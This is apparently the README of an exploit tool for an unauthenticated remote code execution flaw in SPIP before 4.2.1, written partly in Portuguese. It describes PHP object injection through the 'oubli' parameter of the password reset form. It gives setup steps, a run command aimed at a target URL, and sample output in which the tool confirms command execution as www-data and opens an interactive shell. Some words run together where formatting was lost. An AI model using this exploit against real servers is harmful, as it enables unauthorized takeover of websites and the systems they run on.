
Unauthenticated remote code execution vulnerability in SPIP before 4.2.1.
Vulnerabilidade de execução remota de código não autenticada no SPIP anterior à versão 4.2.1. O parâmetro
oublino formulário de redefinição de senha é vulnerável a injeção de objetos PHP devido a falha na desserialização. Um payload serializado malicioso é executado no servidor como o usuário web, e a saída é refletida de volta na resposta dentro do valor do campo de entradaoubli.
/spip.php?page=spip_pass.oubli.value refletido na resposta.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u http://TARGET/spip
Exemplo:
$ python3 exploit.py -u http://10.10.10.10/spip
[*] Fetching anti-CSRF token...
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data